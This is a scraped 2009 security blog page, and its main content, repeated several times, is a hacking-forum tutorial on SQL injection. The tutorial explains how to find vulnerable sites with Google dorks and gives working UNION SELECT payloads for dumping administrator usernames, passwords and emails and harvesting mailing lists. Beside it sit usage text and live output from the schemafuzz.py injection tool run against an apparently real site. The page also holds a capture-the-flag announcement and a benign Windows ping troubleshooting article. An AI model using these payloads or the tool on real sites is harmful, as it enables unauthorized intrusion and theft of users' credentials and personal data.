Notice we change 'database()' to our hexed database name '0x6578616d706c65646232'
For our example we'll say we got back:
newsletter, members, administrators
That's the good stuff, normally you wouldn't have found this information and just moved onto another site.
8. Getting Column Names
This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 FROM information_schema.columns WHERE table_schema=database()--
That's gonna give you every column name on the database but you don't want the columns for 'exampledb' remember because there wasn't any useful info in there, you want just the column names from 'exampledb2' because there were member info and admin info in that database. So now you open you Text-to-hex again and hex your database again so 'exampledb2' becomes ' 0x6578616d706c65646232'
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns WHERE table_schema= 0x6578616d706c65646232--
That will only return the column names from that selected database. We'll say we got back:
email, username, password, first_name, last_name
If you remember the table names from exampledb2, which you should because you always paste into notepad right?, you can get the administrators username, password, email address, and full name.
To get this you would do:
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password,0x3a,email,0x3a,first_name,0x3a,last_name) ,3,4,5 FROM exampledb2.administrators--
0x3a being the hex value for a colon ':' so that you can easily seperate the information. Sometimes this wont work though, sometimes you have to hex the databasename.tablename (not alot but sometimes) so in that case it would be:
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5 from 0x6578616d706c656462322e61646d696e6973747261746f7273--
Which will then give you what you're looking for.
9. LIMIT What is it and why do I need to know it?
Ever found a database that is full of users/emails/anything else that you want but can't get it all because the website just wont display them all at one go? Well, this is where you need the LIMIT statement.
For our example we will say we want the emails from the exampledb2.newsletter table, the only column in that table is 'email', probably never be that easy but hey this is an example right? There are 500 emails in this database and when we group_concat(email) from the database we only get back 20 results and 1 half cut-off like random.douchebag@gma so how do we get the rest of the 480 emails? This is where your perseverance will come into play, if you want it that bad you would use the LIMIT statement to get them since we already got the first 20 results we'll start at 21 to get the full email address that is cut off:
Code:
http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 21,9999999--
Note when using limit: You can't use group_concat() it will error, drop the group and just use concat().
The 999999 can be any number higher than the row count in the database I just use that because it is easy. You would do this increasing your number by 1 until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 22,9999999--,limit 23,9999999--,limit 24,9999999--
Yes, it will take a long time to do this, there are tools used to dump databases though, most common used is SQLI Helper, thought this tool is flawed too because it won't increase the last number when limiting if needed.
10. End Notes
Well, that's it. I do hope that I helped at least a few of you. I know it was a long read for those of you that actually went through it all, but I think at least half of the people who read this will learn something new. On another note SQL Injection can be fun to do, defacing websites even more fun sometimes, but you need to know that it is illegal. Here are some things to keep in mind.
[qoute]
Hacking is covered under law Title 18: Crimes and Criminal Procedure: Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done.
[/qoute]
The Ten Commandments of Computer Ethics by the Computer Ethics Institute:
1. Thou shalt not use a computer to harm other people.
2. Thou shalt not interfere with other people's computer work.
3. Thou shalt not snoop around in other people's computer files.
4. Thou shalt not use a computer to steal.
5. Thou shalt not use a computer to bear false witness.
6. Thou shalt not copy or use proprietary software for which you have not paid.
7. Thou shalt not use other people's computer resources without authorization or proper compensation.
8. Thou shalt not appropriate other people's intellectual output.
9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.
10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.
If I helped, post some feedback, if I didn't PM me with your question and if it warrants an answer I will reply and add that into the tutorial.
Don't forget to RATE my thread. 5 Stars would be nice.
Last minute edition:
Difinitive SQL E-Book Collection
Contents:
The Visibooks Guide to MySQL Basics
Sybex - Mastering MySQL 4
Sams - Teach Yourself Mysql in 10 Minutes
Sams - MySQL Database Design and Tuning
Sams - MySQL Tutorial
Sams - MySQL Phrasebook - Essential Code and Commands
Sams - MySQL Crash Course
Sams - MySQL Certification Study Guide
Sams - MySQL 2nd Edtion
Peachpit Press - Visual Quickstart Guide -MySQL
O'Reilly - MySQL Pocket Refernce
O'Reilly - MySQL in a Nutshell
O'Reilly - MySQL Cookbook
O'Reilly - MySQL and mSQL
O'Reilly - Managing and Using MySQL
O'Reilly - High Performance MySQL
MySQL Press - MySQL Administrator's Guide and Language Reference
McGraw Hill - MySQL Essential Skills
Download Link
Code:
#!/usr/bin/laden -w
use Weapons::Of qw(Mass Destruction);
if ( $home eq "Cave M_of_Nowhere") {
print "I HAZ DE URANIUM\n";
}
http://www.hackforums.net/showthread.php?tid=94738
1. Introduction(Kinda Pointless)
2. Finding Vulnerable Sites.
3. Getting Number of Columns.
4. Getting MySQL Version.
5. Getting Database Names.
6. Getting Database User.
7. Getting Table Names.
8. Getting Column Names.
9. LIMIT, What is it and why do I need to know it?
10. End Notes
1. Introduction(Kinda Pointless)
First, if you find that I have written something that is wrong, please address it and I will fix it. There is one simple reason why I am writing this paper, mainly because there are so many simple SQL Injection questions that flood this board everyday and people just simple say things like “Learn to use the search function.â€, “Google is your friendâ€, or some other just completely non-helpful remarks. If you aren't going to help someone why reply at all? Just go on to another thread. That doesn't even bring up the number of private messages that I receive daily with questions related to SQL Injection, on a slow day I receive 1-2 private messages, on a normal day I will get up to 10 with questions about SQL, or even “What is your MSN/Yahoo/AIM/E-Mail, I need help.†Most of the time I do try to help as much as I can, but it does get old too. Well, enough ranting here goes.
2. Finding Vulnerable Sites
First you need to know what makes a site vulnerable to SQL Injection before you can find and vulnerable sites.
The most common reason that a site is vulnerable to SQL Injection attacks in because the owner/coder didn't use the built in MySQL feature 'mysql_real_escape_string()'. The purpose of this function is to sanitize or remove special characters from an SQL query. The most common side-effect is the simple Username/Password exploit ' or 1='1. Most website administrators today use this function along with stripslashes() or addslashes() to further sanitize the data.
Well since I gave you a very basic reason for why certain sites are vulnerable we will move onto finding some vulnerable sites to play with.
When talking about finding sites to inject you will hear the term “dork†a lot, what this refers to is a google search term targeted at finding vulnerable websites. A “google dork†uses the built in google functions inurl:, or allinurl: to search for websites that have certain strings in their URL or website address, an example of a google dork is: inurl:index.php?id=1, entering this string into the google search engine would return all of the sites in google's cache with the string index.php?id=1 in their URL, Ex: http://www.example.com/index.php?id=1
Here are some lists of “dorks†to use:
http://www.hackforums.net/showthread.php?tid=76925
http://www.hackforums.net/showthread.php?tid=71313
http://go-blog.web.id/?p=3
http://sql-injection-tools.blogspot.com/...hafiq.html
Now that we know what a google dork is we can start finding vulnerable sites. To be vulnerable the site has to have a GET parameter in the URL: index.php?id=1, id=1 being the GET parameter 'gets' the 1 'id' from the SQL database(Understand? Good.)
So you are going to go to http://www.google.com,http://www.blackle.com, or http://www.dogpile.com and search for your selected dork. When you get your list you can start checking for vulnerabilities. To do this the most common way is to add a back-tick after one of the integers in the URL
Example: http://www.example.com/index.php?id=1'
Now there are many ways for a site to show you that it is vulnerable the most common are errors:
You have an error in your SQL Syntax
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():
If you receive any of these errors when you enter the ' after the number then chances are the site is vulnerable to SQL Injection attacks to some extent, but that isn't the only way to see if a site is vulnerable, the biggest overlooked error is when a main part of the site just simply disappears, such as a news article or a body of text on the main site. If this happens then it is likely that the site is vulnerable also.
3. Getting Number of Columns
After you find your vulnerable site the first step you need to take is to find the number of columns in the table that is in use. There are a couple of ways that people do this, personally I use the ORDER BY statement, there is also GROUP BY which accomplishes the same thing, but it's just habit. A lot of people use the string AND 1=0 before their queries, most of the time this is just a waste of time to type this out, the only time you need this is if you try ORDER BY 300-- and you don't receive an error, then you would add the and 1=0 to your query.
To find number of columns you start with ORDER BY 1, if it doesn't error then you are good to go, sometimes you will get a syntax error when doing ORDER BY 1 that's why it is important to start there, if you get the syntax error your best bet is to move on to another site. If you don't get an error I always go to ORDER BY 300 to see if I will get an error there, sometimes you could go on for years and never get an error, there can't be 300 columns in the database so you should always get an error. After getting the error on 300 it is up to you how you want to find the number of columns, personally I jump around out of habit I usually do something like this:
Code:
http://www.example.com/index.php?id=1 ORDER BY 1--
no error
http://www.example.com/index.php?id=1 ORDER BY 300--
error
http://www.example.com/index.php?id=1 ORDER BY 10--
error
http://www.example.com/index.php?id=1 ORDER BY 5--
no error
http://www.example.com/index.php?id=1 ORDER BY 6--
error
After this you know that your website has 5 columns because it errors on everything above ORDER BY 5, and doesn't error on anything below ORDER BY 5.
Note on comments: Comments are not always necessary when injecting a website, although sometimes they are, by comments I am referring to the – at the end of the URL.
Possible comments to use are --, /*, /**/, or simply nothing at the end.
4. Getting MySQL Version
Now that we have the number of columns you are going to want to get the version of the database you are working on, this is an important step, because any version lower than 5 you will have to guess table names and column names. I don't recommend working on a database lower than version 5 for beginners, you should get aquanted with SQL Injection first. Before we can get the version you have to find a visible column number. This is where the Injection part really starts. To do this you will use a SELECT statement and the UNION statement. Most people don't understand that these are two completely different SQL statements, the reason you use UNION SELECT is because you are already SELECTing from the database when you are simply visiting the site.
For example: http://www.example.com/index.php?id=1
What this URL is telling the database is SELECT * FROM 'tablenamehere' WHERE id='1';
Now when we add out UNION into that URL we are adding two SQL statements together since our example website has 5 columns this is what our query would look like:
http://www.example.com/index.php?id=1+UNION+SELECT+1,2,3,4,5--
The website should return normal after doing this, if it doesn't and it tells you something like “Forbidden†or some other error, then the website doesn't support union statements and you need to move on. If it doesn't error then add a negative sign after the equals sign like this:
http://www.example.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5--
There is a reason for this people, I've been asked many times why you do this, the reason is when you send this query to the database you are sending something like:
SELECT * FROM 'tablenamehere' WHERE id='-1' AND SELECT 1,2,3,4,5
There isn't a -1 in the id column so the database will return a blank section of the page, but since we have our other SELECT statement in there it will return numbers back in the data's place. Those are our visible columns. For our example we'll say we got back the numbers 2 and 3 so these are the numbers that we can retrieve data from. To get our database version there are two ways either @@version or version(). To use them do this:
http://www.example.com/index.php?id=-1+UNION+SELECT+1,@@version,3,4,5--
or
http://www.example.com/index.php?id=-1+UNION+SELECT+1,concat(version()),3,4,5--
If you get an error like “Illegal mix of coallations when using @@version you simple have to convert it to latin from UTF8 like so:
http://www.example.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--
NOTE: Notice that we completely replace the number 2 with our query, something like union select 1,concat(version()),2,3,4,5-- will not work.
Well if it worked you know now the version of the MySQL database in use you will see something like 5.0.13-log, or 4.0.0.1-delta, there are countless versions and types but all we need to focus on is the first number if it 5 then we are good to go, if it is 4 then if you are new you should move on.
5. Getting Database Names
I haven't seen this covered on any papers on SQL Injection so I will include it because it is an important part of SQL Injection. For novice SQL Injectors ever started to inject a website then find no useful data such as. usernames/passwords? Most likely because the current database in use for the site only holds data like news articles and the like. This is where getting the different database names is important. In version of MySQL higher than 5 there will always be a database named 'information_schema' and most of the time a database named 'test', neither of these hold data that you will need to know, but yet the information_schema database is the reason that injection v5+ databases is so easy.
To get list of databases do this:
http://www.example.com/index.php?id=-1+UNION+SELECT+1,group_concat(schema_name),3,4,5+ FROM+information_schema.schemata--
Now where you saw the database version pop up earlier you will see the names of all of the different databases we will say for our example we got back something like this:
information_schema,exampledb,exampledb2,test
If you want to know what the database in use right now do this:
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,concat(database()),3,4,5--
We'll say we got back 'exampledb'.
From now on it is a good idea to have a text editor open like notepad/gEdit to save this information for later use. I always have notepad open when I am injecting a site, with a template like this:
Databases:
Tables:
Columns:
So that I can quickly copy and paste in. In my opinion this is a good habit to get into.
6. Getting Database User
Not really necessary but good to know use user():
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,concat(user()),3,4,5--
7. Getting Table Names
I'm going to go a little more in-depth than most tutorials you'll see on the internet here because they aren't very thorough, most will just tell you how to get the tables of the current database but I am going to show you how to get table names from selected databases.
6. To get table names of current database:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5 from information_schema.tables WHERE table_schema=database()--
You will see a list of table names come out, for our example we will say we got:
news, images, ads, links
Wow that looks useful huh? That is information we can get from just looking at the website, so now it's time to get tables from our other database we found earlier 'exampledb2' This is where your best friend the hex converter will come in handy. To get tables from selected databases you have to hex the name.
So we convert exampledb2 to 6578616d706c65646232. Always rember to add the 0x in front of the hexed name to tell the database that it is hex encoded and it need to decode it to get the right name. So our database name ends up being 0x6578616d706c65646232.
Online text-to-hex converters:
http://www.motobit.com/util/binary-file-...string.asp
http://www.string-functions.com/string-hex.aspx
http://home2.paulschou.net/tools/xlate/
Now for the query:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=0x6578616d706c65646232--
Notice we change 'database()' to our hexed database name '0x6578616d706c65646232'
For our example we'll say we got back:
newsletter, members, administrators
That's the good stuff, normally you wouldn't have found this information and just moved onto another site.
8. Getting Column Names
This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 FROM information_schema.columns WHERE table_schema=database()--
That's gonna give you every column name on the database but you don't want the columns for 'exampledb' remember because there wasn't any useful info in there, you want just the column names from 'exampledb2' because there were member info and admin info in that database. So now you open you Text-to-hex again and hex your database again so 'exampledb2' becomes ' 0x6578616d706c65646232'
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns WHERE table_schema= 0x6578616d706c65646232--
That will only return the column names from that selected database. We'll say we got back:
email, username, password, first_name, last_name
If you remember the table names from exampledb2, which you should because you always paste into notepad right?, you can get the administrators username, password, email address, and full name.
To get this you would do:
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password,0x3a,email,0x3a,first_name,0x3a,last_name) ,3,4,5 FROM exampledb2.administrators--
0x3a being the hex value for a colon ':' so that you can easily seperate the information. Sometimes this wont work though, sometimes you have to hex the databasename.tablename (not alot but sometimes) so in that case it would be:
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5 from 0x6578616d706c656462322e61646d696e6973747261746f7273--
Which will then give you what you're looking for.
9. LIMIT What is it and why do I need to know it?
Ever found a database that is full of users/emails/anything else that you want but can't get it all because the website just wont display them all at one go? Well, this is where you need the LIMIT statement.
For our example we will say we want the emails from the exampledb2.newsletter table, the only column in that table is 'email', probably never be that easy but hey this is an example right? There are 500 emails in this database and when we group_concat(email) from the database we only get back 20 results and 1 half cut-off like random.douchebag@gma so how do we get the rest of the 480 emails? This is where your perseverance will come into play, if you want it that bad you would use the LIMIT statement to get them since we already got the first 20 results we'll start at 21 to get the full email address that is cut off:
Code:
http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 21,9999999--
Note when using limit: You can't use group_concat() it will error, drop the group and just use concat().
The 999999 can be any number higher than the row count in the database I just use that because it is easy. You would do this increasing your number by 1 until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 22,9999999--,limit 23,9999999--,limit 24,9999999--
Yes, it will take a long time to do this, there are tools used to dump databases though, most common used is SQLI Helper, thought this tool is flawed too because it won't increase the last number when limiting if needed.
10. End Notes
Well, that's it. I do hope that I helped at least a few of you. I know it was a long read for those of you that actually went through it all, but I think at least half of the people who read this will learn something new. On another note SQL Injection can be fun to do, defacing websites even more fun sometimes, but you need to know that it is illegal. Here are some things to keep in mind.
[qoute]
Hacking is covered under law Title 18: Crimes and Criminal Procedure: Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done.
[/qoute]
The Ten Commandments of Computer Ethics by the Computer Ethics Institute:
1. Thou shalt not use a computer to harm other people.
2. Thou shalt not interfere with other people's computer work.
3. Thou shalt not snoop around in other people's computer files.
4. Thou shalt not use a computer to steal.
5. Thou shalt not use a computer to bear false witness.
6. Thou shalt not copy or use proprietary software for which you have not paid.
7. Thou shalt not use other people's computer resources without authorization or proper compensation.
8. Thou shalt not appropriate other people's intellectual output.
9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.
10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.
If I helped, post some feedback, if I didn't PM me with your question and if it warrants an answer I will reply and add that into the tutorial.
Don't forget to RATE my thread. 5 Stars would be nice.
Last minute edition:
Difinitive SQL E-Book Collection
Contents:
The Visibooks Guide to MySQL Basics
Sybex - Mastering MySQL 4
Sams - Teach Yourself Mysql in 10 Minutes
Sams - MySQL Database Design and Tuning
Sams - MySQL Tutorial
Sams - MySQL Phrasebook - Essential Code and Commands
Sams - MySQL Crash Course
Sams - MySQL Certification Study Guide
Sams - MySQL 2nd Edtion
Peachpit Press - Visual Quickstart Guide -MySQL
O'Reilly - MySQL Pocket Refernce
O'Reilly - MySQL in a Nutshell
O'Reilly - MySQL Cookbook
O'Reilly - MySQL and mSQL
O'Reilly - Managing and Using MySQL
O'Reilly - High Performance MySQL
MySQL Press - MySQL Administrator's Guide and Language Reference
McGraw Hill - MySQL Essential Skills
Download Link
Code:
#!/usr/bin/laden -w
use Weapons::Of qw(Mass Destruction);
if ( $home eq "Cave M_of_Nowhere") {
print "I HAZ DE URANIUM\n";
}
http://www.hackforums.net/showthread.php?tid=94738
Tuesday, June 2, 2009
LAMPSecurity.org Capture the Flag Exercise
Hello,
I'm happy to announce that the second installment (cryptically called
CTF5) of LAMPSecurity.org's capture the flag series of exercises is now
available. This edition is novel in that it includes a 0-day exploit
that can be used (indirectly) to gain root. This is a training exercise
released in support of the educational mission of LAMPSecurity.org. The
exercise is modeled after many of the exercises that are presented in
expensive commercial training courses, except it's free, of course.
Unlike tools like OWASP's WebGoat, LAMPSecurity.org's capture the flag
exercise consists of a full, vulnerable, virtual machine (VMWare's free
Player is required). This allows users to explore vulnerabilities at
every level of the LAMP stack. The first exercise includes an "attack"
VM as well, with tools pre-installed (where possible). It also includes
over 60 pages of step-by-step documentation so no prior experience is
necessary (although the documentation only outlines one of several
routes to root compromise). The exercise is designed to educate system
administrators and developers on some common dangers and
mis-configurations facing Linux,Apache,MySQL, PHP (LAMP) applications.
Further details, including the documentation, are available at
http://lampsecurity.org/capture-the-flag-5. The vulnerable virtual
machine and attack image are available from SourceForge at
https://sourceforge.net/projects/lampsecurity/. Constructive feedback is
of course welcome. Thank you and enjoy.
- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org
I'm happy to announce that the second installment (cryptically called
CTF5) of LAMPSecurity.org's capture the flag series of exercises is now
available. This edition is novel in that it includes a 0-day exploit
that can be used (indirectly) to gain root. This is a training exercise
released in support of the educational mission of LAMPSecurity.org. The
exercise is modeled after many of the exercises that are presented in
expensive commercial training courses, except it's free, of course.
Unlike tools like OWASP's WebGoat, LAMPSecurity.org's capture the flag
exercise consists of a full, vulnerable, virtual machine (VMWare's free
Player is required). This allows users to explore vulnerabilities at
every level of the LAMP stack. The first exercise includes an "attack"
VM as well, with tools pre-installed (where possible). It also includes
over 60 pages of step-by-step documentation so no prior experience is
necessary (although the documentation only outlines one of several
routes to root compromise). The exercise is designed to educate system
administrators and developers on some common dangers and
mis-configurations facing Linux,Apache,MySQL, PHP (LAMP) applications.
Further details, including the documentation, are available at
http://lampsecurity.org/capture-the-flag-5. The vulnerable virtual
machine and attack image are available from SourceForge at
https://sourceforge.net/projects/lampsecurity/. Constructive feedback is
of course welcome. Thank you and enjoy.
- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org
Wednesday, May 27, 2009
schemafuzz.py by rsauron
schemafuzz.py -h
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."
Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.
Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 --findcol
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://www.ayamitiklembu/news.php?id=1--
[+] Evasion Used: "+" "--"
[+] 23:35:53
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--
[+] darkc0de URL: http://www.ayamitiklembu/news...rkc0de,2,3
[-] Done!
schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 --fuzz
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://www.ayamitiklembu/news...c0de,2,3--
[+] Evasion Used: "+" "--"
[+] 23:43:22
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web27-gc
User: web27-gc@79.170.40.171
Version: 5.0.77-community
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...
Reference:
http://www.hackforums.net/showthread.php?tid=79972
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."
Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.
Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 --findcol
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://www.ayamitiklembu/news.php?id=1--
[+] Evasion Used: "+" "--"
[+] 23:35:53
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--
[+] darkc0de URL: http://www.ayamitiklembu/news...rkc0de,2,3
[-] Done!
schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 --fuzz
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://www.ayamitiklembu/news...c0de,2,3--
[+] Evasion Used: "+" "--"
[+] 23:43:22
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web27-gc
User: web27-gc@79.170.40.171
Version: 5.0.77-community
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...
Reference:
http://www.hackforums.net/showthread.php?tid=79972
Monday, May 25, 2009
Troubleshooting Connectivity Problems on Windows Networks
This article series will explain various troubleshooting techniques that you can use when machines on a Windows network have difficulty communicating with each other.
If you would like to be notified when Brien M. Posey releases the next part of this article series please sign up to the WindowsNetworking.com Real time article update newsletter.
Today’s network hardware and software is more reliable than ever but even so, things do occasionally go wrong. In this article series, I am going to discuss some troubleshooting techniques that you can use when a host on your Windows network has trouble communicating with other network hosts. For the sake of those with less experience in working with the TCP/IP protocol, I’m going to start with the basics, and then work toward the more advanced techniques.
Verify Network Connectivity
When one host has trouble communicating with another, the first thing that you must do is to gather some information about the problem. More specifically, you need to document the host’s configuration, find out if the host is having trouble communicating with any other machines on the network, and find out if the problem effects any other hosts.
For example, suppose that a workstation is having trouble communicating with a particular server. That in itself doesn’t really give you a lot to go on. However, if you were to dig a little bit deeper into the problem and found out that the workstation couldn’t communicate with any of the network servers, then you would know to check for a disconnected network cable, a bad switch port, or maybe a network configuration problem.
Likewise, if the workstation were able to communicate with some of the network servers, but not all of them, that too would give you a hint as to where to look for the problem. In that type of situation, you would probably want to check to see what the servers that could not be contacted had in common. Are they all on a common subnet? If so, then a routing problem is probably to blame.
If multiple workstations are having trouble communicating with a specific server, then the problem probably isn’t related to the workstations unless those workstations were recently reconfigured. More than likely, it is the server itself that is malfunctioning.
The point is that by starting out with a few basic tests, you can gain a lot of insight into the problem at hand. The tests that I am about to show you will rarely show you the cause of the problem, but they will help to narrow things down so that you will know where to begin the troubleshooting process.
PING
PING is probably the simplest TCP/IP diagnostic utility ever created, but the information that it can provide you with is invaluable. Simply put, PING tells you whether or not your workstation can communicate with another machine.
The first thing that I recommend doing is opening a Command Prompt window, and then entering the PING command, followed by the IP address of the machine that you are having trouble communicating with. When you do, the machine that you have specified should produce four replies, as shown in Figure A.
Figure A: The specified machine should generate four replies
The responses essentially tell you how long it took the specified machine to respond with thirty two bytes of data. For example, in Figure A, each of the four responses were received in less than four milliseconds.
Typically, when you issue the PING command, one of four things will happen, each of which has its own meaning.
The first thing that can happen is that the specified machine will produce four replies. This indicates that the workstation is able to communicate with the specified host at the TCP/IP level.
The second thing that can happen is that all four requests time out, as shown in Figure B. If you look at Figure A, you will notice that each response ends in TTL=128. TTL stands for Time To Live. What this means is that each of the four queries and responses must be completed within 128 milliseconds. The TTL is also decremented once for each hop on the way back. A hop occurs when a packet moves from one network to another. I will be talking a lot more about hops later on in this series.
Figure B: If all four requests time out, it could indicate a communications failure
At any rate, if all four requests have timed out, it means that the TTL expired before the reply was received. This can mean one of three things:
Communications problems are preventing packets from flowing between the two machines. This could be caused by a disconnected cable, a bad routing table, or a number of other issues.
Communications are occurring, but are too slow for PING to acknowledge. This can be caused by extreme network congestion, or by faulty network hardware or wiring.
Communications are functional, but a firewall is blocking ICMP traffic. PING will not work unless the destination machine’s firewall (and any firewalls between the two machines) allow ICMP echos.
A third thing that can happen when you enter the PING command is that some replies are received, while others time out. This can point to bad network cabling, faulty hardware, or extreme network congestion.
The fourth thing that can occur when pinging a host is that you receive an error similar to the one that is shown in Figure C.
Figure C: This type of error indicates that TCP/IP is not configured correctly
The PING: Transmit Failed error indicates that TCP/IP is not configured correctly on the machine on which you are trying to enter the PING command. This particular error is specific to Vista though. Older versions of Windows produce an error when TCP/IP is configured incorrectly, but the error message is “Destination Host Unreachable”
What if the PING is Successful?
